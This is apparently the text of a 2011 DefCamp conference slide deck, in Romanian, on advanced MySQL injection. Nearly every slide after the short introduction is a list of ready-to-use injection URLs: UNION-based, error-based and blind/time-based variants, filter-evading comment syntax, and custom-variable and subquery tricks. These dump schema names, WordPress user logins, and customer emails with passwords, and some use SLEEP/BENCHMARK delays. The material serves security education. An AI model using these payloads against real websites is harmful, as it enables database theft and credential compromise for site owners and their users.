Advanced data mining in my sql injections using subqueries and custom variables

DEFCAMP – 2011 “Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables”

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ - CUPRINS - [ * ] Notiuni introductive: SQL , Injectii SQL [ * ] Variabile Particularizate si Sub-Interogari in MySQL [ * ] Optimizarea tehnicilor clasice de extragere a informatiilor : - variabile MySQL ( Server System Variables / Session Variables ) - bazele de date disponibile ( schema_name / SCHEMATA ) - tabelele si coloanele aferente acestora ( table_name / column_name ) - privilegii ( USER_PRIVILEGES : GRANTEE/PRIVILEGE_TYPE/IS_GRANTABLE ) - citirea & scrierea fisierelor ( LOAD_FILE / INTO DUMPFILE - OUTFILE) - atacuri Denial of Service ( DOS )

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Structured Query Language (SQL - limbajul structurat de interogare) este limbajul standard folosit pentru manipularea si regasirea datelor din baze de date relationale. Prin SQL, un programator sau un administrator de baze de date poate face urmatoarele lucruri: * sa modifice structura unei baze de date ; * sa schimbe valorile de configurare pentru securitatea sistemului; * sa adauge drepturi utilizatorilor asupra bazelor de date sau tabelelor; * sa interogheze o baza de date asupra unor informatii; * sa actualizeze continutul unei baze de date.

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Cum functioneaza PHP + MySQL ? < request-ul efectuat de catre client < procesarea request-ului la nivel de server < raspunsul trimis catre client ca rezultat al cererii

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ What could possibly go wrong ? !!!!!!

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ SQL Injections ( Injectii SQL ) – tehnica de malformare a sintaxei SQL datorata modificarii valorilor parametrilor $_GET, $_POST, cookies, headers, ce sunt preluate si prelucrate de fisierele server-side fara a filtra in prealabil caractere sau comenzi ce pot fi periculoase.

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Exemplu de injectie MySQL clasica.

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Tipuri de injectii SQL : UNION BASED index.php?id=1’ and 2=4 UNION SELECT 1,2,3,4,5,6,7,8,9,10 -- index.php?poze=vedete"+and+false+union+all+select+1,2,version(),4,5,6+and+"1"="1 index.php?id=-1+UNION+SELECT+1,convert(@@version using latin1),3,4,5-- index.php? id=-1/*!AND*/1=1+UNiOn+ALl+SelECt+1,/**/2,/**/3,/**/4/**/limit/**/1,2 index.php?id=1+and+1=0+union+select+ sql_no_cache+1,2,3,4,5

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Tipuri de injectii SQL : UNION BASED

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Tipuri de injectii SQL : ERROR BASED index.php?id=(@:=1)||@+group+by+concat(@@version,!@)having@||min(@:=0)--+ Index.php?id=53+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID((select+concat_ws(0x3a,version(),database(),user())),1,63),+FLOOR(RAND(0)*2)))+--+ news.php?id=589'+or+1+group+by+concat((select+version()),floor(rand(0)*2))+having+min(0)+or+1-- + details.php?ID=9 or (select count(*) from mysql.user group by concat(version(),floor(rand(0)*2)))-- ?productid=1124+and+row(1,2)in(select+count(*),concat((select+table_name+from+information_schema.tables+limit+3,1),0x3a,floor(rand(0)*2))as+a+from+information_schema.tables+x+group+by+a)--

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Tipuri de injectii SQL : ERROR BASED

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Tipuri de injectii SQL : BLIND index.php?id=1’ and substring(@@version,1,1)=4-- index.php?id=1’ and substring(@@version,1,1)=5-- index.php?id=1 and (SELECT 1 from admin limit 0,1)=1 news.php?id = -1 'OR id = IF(ASCII(SUBSTRING (SELECT USER ()), 1, 1 )))>= 100, 1, SLEEP (3)) index.html?mdl=5020+and+ascii(lower(substring((select+table_name+from+information_schema.tables+limit+17,1),1,1 )))>1 index.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>103 script.php?par=1 and IF(ASCII(SUBSTRING((SELECT USER()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW()))) – script.php?par=1 and IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) --

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Tipuri de injectii SQL : BLIND

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ MySQL Custom Variables (Variabile Particularizate)

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ MySQL Sub-Queries (Sub-Interogari) SELECT * FROM t1 WHERE column1 = (SELECT column1 FROM t2);

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Injectii MySQL - folosind Custom Variables : CLASIC SYNTAX : index.php?id=2’+and+1=0+union+select+1,2,3,4,5-- NEW SYNTAX: index.php?id=2’+and+1=0+union+select+@i:=version(),@i,@i,@i,@i-- @i:=concat( version(),0x3a,database() ) @i:=cast(version()+as+binary) @i:=convert(version(),binary) @i:=convert(version()+using+latin1) @i:=aes_decrypt(aes_encrypt(version(),1),1) @x:=concat(0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name)

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Injectii MySQL - folosind SubQueries : index.php?id = -1+union+select+*+from+users,(select+1,2,3,4,5,6)a-- index.php?id=-1+union+(select 1,2,3,4,5 order by 1 where 1=2) UNION (select1,2,3,4,5)--+--X id=3 AND (SELECT 7574 FROM(SELECT COUNT(*) ,CONCAT(CHAR(58,103,104,115,58),(SELECT (CASE WHEN (7574=7574) THEN 1 ELSE 0 END)), CHAR(58,101,118,118,58), FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Injectii MySQL - folosind SubQueries + Custom Variables : index.php?id=-4 union select 1,2,(select(@x) from(select(@x:=0x00) , (select (null) from (information_schema.columns) where (table_schema!=‘information_schema’) and (0x00) in (@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4-- index.php?id=-1 Union select 1,2, concat(@i:=0x00,@o:=0x0d0a, benchmark(150, @o:=CONCAT(@o,0x0d0a,(SELECT+concat(@i:=mail,0x3a,password)+from+customers+WHERE+mail > @i+order+by+mail+LIMIT+1+))),o),4 index.php?id=-7’ union (select * from (select @i:=version())q join (select@i)w join (select@i)e join (select @i)r join (select @i)t join (select @i)y join (select @i)u join (select @i)i join (select @i)o)--+--qwertyxxxxxxxx

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Injectii MySQL - folosind SubQueries + Custom Variables : index.php?id=2'+and+1=0+union+select+1,2,3,4,concat(@i:=0x00,@o:=0xd0a,benchmark(1010370,@o:=CONCAT(@o,0xd0a,(SELECT+concat(0x3c62723e,@i:=user_login)+FROM+wp_users+WHERE+user_login>@i+order+by+user_login+LIMIT+1))),@o),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables--

Advanced data mining in my sql injections using subqueries and custom variables

Recommended

Recommended

More Related Content

Similar to Advanced data mining in my sql injections using subqueries and custom variables

Similar to Advanced data mining in my sql injections using subqueries and custom variables (20)

More from DefCamp

More from DefCamp (20)

Recently uploaded

Recently uploaded (20)

Advanced data mining in my sql injections using subqueries and custom variables

Editor's Notes